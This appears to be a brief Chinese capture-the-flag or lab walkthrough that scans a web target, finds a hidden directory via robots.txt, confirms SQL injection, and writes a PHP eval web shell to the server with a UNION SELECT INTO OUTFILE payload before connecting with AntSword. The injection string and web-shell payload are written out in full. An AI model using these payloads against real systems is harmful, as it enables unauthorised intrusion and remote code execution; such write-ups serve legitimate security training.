用nmap扫ip的端口,发现只有80端口用dirb扫描发现有robots.txt文件,我们发现robots.txt中有标明目录,我们再去尝试一一访问。
尝试访问/se3reTdir777/目录,出现一个提交框。
sql注入
输入1' or1=1 #,显示正常,存在注入。采取手工注入方式获得用户名和密码。
用dirsearch发现有php探针文件,我们访问它。
找到绝对路径并写入一句话木马文件。
在运行框输入
-1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/11.php" #
写入成功后打开蚁剑。